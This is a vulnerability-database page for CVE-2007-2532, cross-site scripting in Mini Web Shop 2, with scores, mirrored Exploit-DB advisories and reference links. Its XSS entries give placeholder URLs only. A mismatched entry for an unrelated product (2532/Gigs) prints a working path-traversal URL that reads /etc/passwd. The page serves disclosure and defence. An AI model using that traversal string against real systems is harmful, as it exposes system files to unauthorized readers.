CVE-2007-2532
published 2007-05-09CVE-2007-2532: Multiple cross-site scripting (XSS) vulnerabilities in Minh Nguyen Duong Obie Website Mini Web Shop 2 allow remote attackers to inject arbitrary web script or…
PriorityP418medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
3.72%
88.4th percentile
Multiple cross-site scripting (XSS) vulnerabilities in Minh Nguyen Duong Obie Website Mini Web Shop 2 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO (query string) to (1) sendmail.php or (2) order_form.php, different vectors than CVE-2006-6734.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| obie_website | mini_web_shop | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
2532/Gigs 1.2.1 - 'activateuser.php' Local File Inclusion
exploitdb·2007-08-26
CVE-2007-4585 2532/Gigs 1.2.1 - 'activateuser.php' Local File Inclusion
2532/Gigs 1.2.1 - 'activateuser.php' Local File Inclusion
---
-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°
2532|Gigs 1.2.1 (activateuser.php) Local File Inclusion Vulnerability
Discovered by bd0rk || SOH-Crew
www.soh-crew.it.tt
The german Coding and IT-Security Ressource
-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°
Vendor: http://www.2532gigs.com
Download: http://belnet.dl.sourceforge.net/sourceforge/gigs-2532/2532Gigs_1.2.1_stable.zip
License: Free
Vulnerable Code: include_once("languages/$language/settings.php");
Exploit: http://[h0sT]/[dir]/activateuser.php?language=../../../../../../../../etc/passwd%00
Greetings: str0ke, TheJT, GolD_M, die steffi, khaliDb, x0r_32
####The 18 years old, german Hacker bd0rk####
# m
Exploit-DB
ObieWebsite Mini Web Shop 2 - 'Sendmail.php?PATH_INFO' Cross-Site Scripting
exploitdb·2007-05-02
CVE-2007-2532 ObieWebsite Mini Web Shop 2 - 'Sendmail.php?PATH_INFO' Cross-Site Scripting
ObieWebsite Mini Web Shop 2 - 'Sendmail.php?PATH_INFO' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/23847/info
Mini Web Shop is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit these issues to steal cookie-based authentication credentials and launch other attacks.
This issue affects Mini Web Shop 2; other versions may also be affected.
http://remote-server/path/modules/sendmail.php/[xss]
Exploit-DB
ObieWebsite Mini Web Shop 2 - 'order_form.php?PATH_INFO' Cross-Site Scripting
exploitdb·2007-05-02
CVE-2007-2532 ObieWebsite Mini Web Shop 2 - 'order_form.php?PATH_INFO' Cross-Site Scripting
ObieWebsite Mini Web Shop 2 - 'order_form.php?PATH_INFO' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/23847/info
Mini Web Shop is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit these issues to steal cookie-based authentication credentials and launch other attacks.
This issue affects Mini Web Shop 2; other versions may also be affected.
http://remote-server/path/modules/order_form.php/[xss]
No writeups or analysis indexed.
http://osvdb.org/36248http://osvdb.org/36249http://securityreason.com/securityalert/2666http://www.securityfocus.com/archive/1/467831/100/0/threadedhttp://www.securityfocus.com/bid/23847https://exchange.xforce.ibmcloud.com/vulnerabilities/34105http://osvdb.org/36248http://osvdb.org/36249http://securityreason.com/securityalert/2666http://www.securityfocus.com/archive/1/467831/100/0/threadedhttp://www.securityfocus.com/bid/23847https://exchange.xforce.ibmcloud.com/vulnerabilities/34105
2007-05-09
Published